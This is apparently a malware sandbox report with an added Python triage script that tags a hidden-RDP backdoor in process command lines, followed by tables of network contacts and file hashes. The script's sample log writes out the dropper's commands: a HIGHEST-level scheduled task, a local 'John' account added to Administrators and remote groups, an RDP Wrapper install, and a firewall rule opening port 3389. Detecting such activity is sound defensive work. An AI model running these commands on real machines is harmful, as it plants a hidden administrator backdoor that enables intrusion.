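Added example, not part of the sandbox report. SAMPLE_PROCESS_LOG is constructed
from the command lines the report lists (plus two benign lines), not a live feed.
"""
import re

# Localized built-in group names the sample passes to `net localgroup`, mapped to
# a canonical label (assumed mapping; `net localgroup` only accepts the name in
# the OS display language, so the dropper tries several locales blindly).
GROUP_ALIASES = {
    "administrators": "Administrators",
    "administradores": "Administrators",                               # Spanish/Portuguese
    "администраторы": "Administrators",                                # Russian
    "remote desktop users": "Remote Desktop Users",
    "пользователи удаленного рабочего стола": "Remote Desktop Users",  # Russian
    "пользователи удаленного управления": "Remote Management Users",   # Russian
}
# Directories a standard user can write to (assumed list); a HIGHEST-level task
# whose action lives here is a persistence red flag.
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")

RE_NET_USER_ADD = re.compile(r'\bnet1?\s+user\s+(\S+)\s+\S+\s+/add\b', re.I)
RE_NET_LOCALGROUP_ADD = re.compile(r'\bnet1?\s+localgroup\s+"([^"]+)"\s+(\S+)\s+/add\b', re.I)

SAMPLE_PROCESS_LOG = [  # constructed from the report's process tree
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST',
    r'C:\Windows\system32\cmd.exe /c net user John 12345 /add',
    r'C:\Windows\system32\net1 localgroup "Администраторы" John /add',
    r'net localgroup "Пользователи удаленного управления" john /add" John /add',  # malformed, as in the report
    r'net localgroup "Administradores" John /add',
    r'net localgroup "Remote Desktop Users" john /add',
    r'C:\ProgramData\RDPWinst.exe -i',
    r'netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow',
    r'timeout 5',  # benign
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Updater" /TR "C:\Program Files\Vendor\upd.exe" /SC DAILY /RL HIGHEST',  # benign-looking
]


def parse_schtasks(cmd):
    """Return {tn, tr, target, sc, rl} for a `schtasks /create` line, else None."""
    if not re.search(r'\bschtasks(?:\.exe)?"?\s+/create\b', cmd, re.I):
        return None

    def opt(name, quoted):
        # Quoted values may contain escaped quotes (\") nested inside /TR.
        pat = rf'/{name}\s+"((?:[^"\\]|\\.)*)"' if quoted else rf'/{name}\s+(\S+)'
        m = re.search(pat, cmd, re.I)
        return m.group(1) if m else None

    tr = opt("TR", True) or ""
    unescaped = tr.replace('\\"', '"')
    m = re.match(r'"([^"]+)"', unescaped)
    # Quoted action: keep only the executable path; unquoted: keep the whole string.
    target = m.group(1) if m else unescaped
    return {"tn": opt("TN", True), "tr": tr, "target": target,
            "sc": (opt("SC", False) or "").upper(), "rl": (opt("RL", False) or "").upper()}


def classify(cmd):
    """Map one process command line to a set of detection tags (empty if benign)."""
    tags = set()
    low = cmd.lower()
    task = parse_schtasks(cmd)
    if task:
        if task["rl"] == "HIGHEST" and any(p in task["target"].lower() for p in USER_WRITABLE):
            tags.add("schtasks:highest-from-user-writable")
        if task["sc"] == "MINUTE":
            tags.add("schtasks:minute-watchdog")
        if task["sc"] == "ONLOGON":
            tags.add("schtasks:onlogon")
    if RE_NET_USER_ADD.search(cmd):
        tags.add("net:user-add")
    for name, _member in RE_NET_LOCALGROUP_ADD.findall(cmd):
        canon = GROUP_ALIASES.get(name.lower(), name)
        if canon == "Administrators":
            tags.add("net:localgroup-admin-add")
        elif canon in ("Remote Desktop Users", "Remote Management Users"):
            tags.add("net:localgroup-remote-add")
    if all(k in low for k in ("netsh", "advfirewall", "add rule", "dir=in", "action=allow")):
        port = re.search(r'localport=(\d+)', low)
        if port and port.group(1) == "3389":
            tags.add("netsh:allow-inbound-3389")
    if re.search(r'\brdpwinst\.exe\b', low) and re.search(r'\s-i\b', low):
        tags.add("rdpwrap:install")
    return tags


def triage(cmdlines):
    """Aggregate per-line tags into a verdict for the whole process tree.

    'rdp-backdoor' needs a new local account AND an admin/remote-group add AND
    RDP exposure (3389 allow rule or RDP Wrapper install); anything less is
    only 'suspicious', and no tags at all is 'clean'.
    """
    tags, hits, accounts = set(), {}, set()
    for cmd in cmdlines:
        t = classify(cmd)
        if t:
            hits[cmd] = t
            tags |= t
        m = RE_NET_USER_ADD.search(cmd)
        if m:
            accounts.add(m.group(1).lower())
    elevated = {"net:localgroup-admin-add", "net:localgroup-remote-add"} & tags
    exposed = {"netsh:allow-inbound-3389", "rdpwrap:install"} & tags
    if "net:user-add" in tags and elevated and exposed:
        verdict = "rdp-backdoor"
    else:
        verdict = "suspicious" if tags else "clean"
    return {"verdict": verdict, "tags": sorted(tags), "accounts": sorted(accounts), "hits": hits}


if __name__ == "__main__":
    result = triage(SAMPLE_PROCESS_LOG)
    print(result["verdict"], result["accounts"])
    for cmd, t in result["hits"].items():
        print(sorted(t), "<-", cmd[:70])
```

The verdict deliberately requires the three stages together: a lone `net user /add` or a single HIGHEST task from ProgramData is worth an alert but is also seen in sloppy admin tooling, whereas the conjunction with an inbound 3389 rule or an RDP Wrapper install is the hidden-RDP pattern this sample shows. The Program Files task in the sample list gets no tag at all, which is the intended false-positive control.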
Network
| Country | Destination | Domain | Proto |
| RU | 45.144.30.30:5655 | | tcp |
| US | 8.8.8.8:53 | idserver.xyz | udp |
| RU | 45.144.30.58:80 | idserver.xyz | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| GB | 51.105.71.137:443 | | tcp |
| US | 67.24.169.254:80 | | tcp |
| US | 67.24.169.254:80 | | tcp |
| US | 93.184.220.29:80 | | tcp |
| US | 67.24.169.254:80 | | tcp |
| US | 204.79.197.203:80 | | tcp |
Files
memory/2688-130-0x0000000000000000-mapping.dmp
memory/3448-131-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/3212-132-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
memory/4992-135-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\settings.dat
| MD5 | 483fc2e7373a9ee36cc444fca67a32a8 |
| SHA1 | c2fe2355683b670622a8e00784bec5056291e494 |
| SHA256 | 2ee9e47fc7edee23653ee17475e0f040255aad1be11cfcec389335078561944d |
| SHA512 | e3b1cf539e5a542e0cab0ac9122e6027a5d489f0ac89a67070ad21ef7611010122ff2fad8d7d1d7fd6256bdb84e404a7eb8ef31bd86b0162b82c92d49af0a7e4 |
memory/4068-138-0x0000000000000000-mapping.dmp
memory/4364-139-0x0000000000000000-mapping.dmp
memory/2040-140-0x0000000000000000-mapping.dmp
memory/1208-141-0x0000000000000000-mapping.dmp
memory/4904-142-0x0000000000000000-mapping.dmp
memory/4028-143-0x0000000000000000-mapping.dmp
memory/1924-144-0x0000000000000000-mapping.dmp
memory/2116-145-0x0000000000000000-mapping.dmp
memory/3832-146-0x0000000000000000-mapping.dmp
memory/608-147-0x0000000000000000-mapping.dmp
memory/4908-148-0x0000000000000000-mapping.dmp
memory/3436-149-0x0000000000000000-mapping.dmp
memory/3116-150-0x0000000000000000-mapping.dmp
memory/3208-151-0x0000000000000000-mapping.dmp
memory/2512-152-0x0000000000000000-mapping.dmp
memory/4472-153-0x0000000000000000-mapping.dmp
memory/672-154-0x0000000000000000-mapping.dmp
memory/552-155-0x0000000000000000-mapping.dmp
memory/836-156-0x0000000000000000-mapping.dmp
memory/1096-157-0x0000000000000000-mapping.dmp
memory/3672-158-0x0000000000000000-mapping.dmp
memory/548-159-0x0000000000000000-mapping.dmp
C:\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
C:\ProgramData\RDPWinst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
\??\c:\program files\rdp wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
C:\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/4048-164-0x0000000000000000-mapping.dmp
memory/4164-165-0x0000000000000000-mapping.dmp
C:\Programdata\Install\del.bat
| MD5 | 49a9fec3ba20596a39e2bfae59ff4b3c |
| SHA1 | b9cc7369a94831b912ed85532d7cc99f32c82040 |
| SHA256 | 3a85f338cd09aefe830c7b8bac225e3d8d847b7184ecfb625ad7f46492dba681 |
| SHA512 | e5174539967fbc5dd1a4cec7d7a868c45ff58906fd2e580ba49a82b0ff6fabfb0564678d3aca37e86f9124776d7aba6c65fa0f72219e0474adcb9dc8e7484bea |
memory/5036-167-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
C:\ProgramData\Windows Tasks Service\winserv.exe
| MD5 | 3f4f5a6cb95047fea6102bd7d2226aa9 |
| SHA1 | fc09dd898b6e7ff546e4a7517a715928fbafc297 |
| SHA256 | 99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98 |
| SHA512 | de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688 |
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |